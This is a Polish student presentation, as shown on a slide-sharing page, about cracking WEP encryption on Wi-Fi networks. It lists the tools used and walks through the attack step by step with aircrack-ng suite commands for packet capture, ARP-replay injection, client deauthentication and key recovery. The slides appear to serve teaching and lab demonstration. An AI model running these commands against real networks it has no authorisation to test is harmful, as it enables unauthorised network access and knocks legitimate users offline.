Pobieranie prezentacji. Proszę czekać

Pobieranie prezentacji. Proszę czekać

Łamanie zabezpieczeń WEP w sieci Wi-Fi Autorzy: Wojciech Giezek Paweł Guła.

Podobne prezentacje


Prezentacja na temat: "Łamanie zabezpieczeń WEP w sieci Wi-Fi Autorzy: Wojciech Giezek Paweł Guła."— Zapis prezentacji:

1 Łamanie zabezpieczeń WEP w sieci Wi-Fi Autorzy: Wojciech Giezek Paweł Guła

2 Plan prezentacji: Co to jest siec Wi-Fi Klucz WEP Sprzęt i narzędzia Rodzaje ataków

3 Wi-Fi Zestaw standardów do budowy bezprzewodowej sieci komputerowej. Standard Wi-Fi opiera się na IEEE

4 WEP Protokół działający na zasadzie współdzielonego klucza szyfrującego o długości od 40 do 140 bitów i 24 bitowym wektorze inicjującym.

5 5 Sprzęt: średniej klasy notebook z bezprzewodową kartą sieciową Proxim Orinoco Gold (chipset Atheros) średniej klasy notebook z bezprzewodową kartą sieciową Proxim Orinoco Gold (chipset Atheros) średniej klasy komputer PC z bezprzewodową kartą sieciową Edimax średniej klasy komputer PC z bezprzewodową kartą sieciową Edimax access point Netgear access point Netgear notebook: BackTrack Linux (wersja 2.0 beta) notebook: BackTrack Linux (wersja 2.0 beta) PC: Windows 2000 PC: Windows 2000 pakiet aircrack-ng uaktualniony do ostatniej wersji (0.7) pakiet aircrack-ng uaktualniony do ostatniej wersji (0.7) driver pod Atherosa uaktualniony do ostatniej wersji ( ) driver pod Atherosa uaktualniony do ostatniej wersji ( )

6 6 Narzędzia: Macchanger – program do zmiany adresu MAC Macchanger – program do zmiany adresu MAC Kismet – wykrywanie i raportowanie informacji o sieci Kismet – wykrywanie i raportowanie informacji o sieci Aircrack-ng To grupa programów umożliwiających monitorowanie, sniffowanie, analizę sieci bezprzewodowych oraz łamanie WEPa. Podstawowymi binarkami są aircrack-ng (łamanie WEP oraz metodą bruteforce WPA), aireplay-ng (wstrzykiwanie pakietów), airodump- ng (pokazywanie informacji o sieci oraz zapisywanie przechwytywanych pakietów). Aircrack-ng To grupa programów umożliwiających monitorowanie, sniffowanie, analizę sieci bezprzewodowych oraz łamanie WEPa. Podstawowymi binarkami są aircrack-ng (łamanie WEP oraz metodą bruteforce WPA), aireplay-ng (wstrzykiwanie pakietów), airodump- ng (pokazywanie informacji o sieci oraz zapisywanie przechwytywanych pakietów).

7 7 Macchanger

8 8 Kismet

9 9 Rodzaje ataków na siec Wi-Fi Klasyczny Klasyczny Chopchop z klientem i bez Chopchop z klientem i bez Fragment Fragment

10 10 Łamanie klucza WEP Włączamy ariodump-ng lub kismeta Włączamy ariodump-ng lub kismeta Szukamy kanału, SSID i Access pointa na, którym działa siec Szukamy kanału, SSID i Access pointa na, którym działa siec W nowym terminalu, programem airdump-ng nasłuchujemy na kanale –c11, przechwytujemy IV(--vs), i zapisujemy do pliku (-w zapis wep) W nowym terminalu, programem airdump-ng nasłuchujemy na kanale –c11, przechwytujemy IV(--vs), i zapisujemy do pliku (-w zapis wep)

11 11 airodump-ng -c KANAL -w PLIK -- ivs ath0

12 12 Włączono kolejne okienko Do sieci jest podłączony tylko jeden klient (00:0E:2E:8A:2B:DB) Do sieci jest podłączony tylko jeden klient (00:0E:2E:8A:2B:DB) IV (#Data=13) musi wzrosnąc żeby włączyc aircrack-ng i zdobyc klucz IV (#Data=13) musi wzrosnąc żeby włączyc aircrack-ng i zdobyc klucz

13 13

14 14 aireplay-ng --arpreplay -b MAC_AP -h MAC_CLIENT ath0 Włączenie programu aireplay-ng, jest to program bezobsługowy. Spowoduje przechwycenie większej liczby pakietów i wprowadzenia ich Włączenie programu aireplay-ng, jest to program bezobsługowy. Spowoduje przechwycenie większej liczby pakietów i wprowadzenia ich

15 15 aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLIENT ath0 Właczenie w kolejnym terminalu Aireplaya do przyspieszenia ARPów co z kolei przyśpieszy pojawianie się IVs Właczenie w kolejnym terminalu Aireplaya do przyspieszenia ARPów co z kolei przyśpieszy pojawianie się IVs

16 16 Jeśli nasz atak był skuteczny - po chwili "zaskoczy" nasze drugie okienko czekające na ARPy:

17 17 Włączenie pierwszego okienka Liczba IVs rosnie( musi osiągnąc ) Liczba IVs rosnie( musi osiągnąc ) Można w tym czasie rozpocząc lamanie klucza programem aircrack- ng a nasze pakiety dalej się zbierają Można w tym czasie rozpocząc lamanie klucza programem aircrack- ng a nasze pakiety dalej się zbierają

18 18 Zbieranie pakietów

19 19 aircrack-ng -n 64 -b MAC_AP PLIK.ivs Rozpoczecie łamania klucza WEP!!! Rozpoczecie łamania klucza WEP!!!

20 20 Łamanie klucza

21 21 Znalezienie klucza: 6d:6f:E4:08:41

22 Dziękujemy za uwagę. 22


Pobierz ppt "Łamanie zabezpieczeń WEP w sieci Wi-Fi Autorzy: Wojciech Giezek Paweł Guła."

Podobne prezentacje


Reklamy Google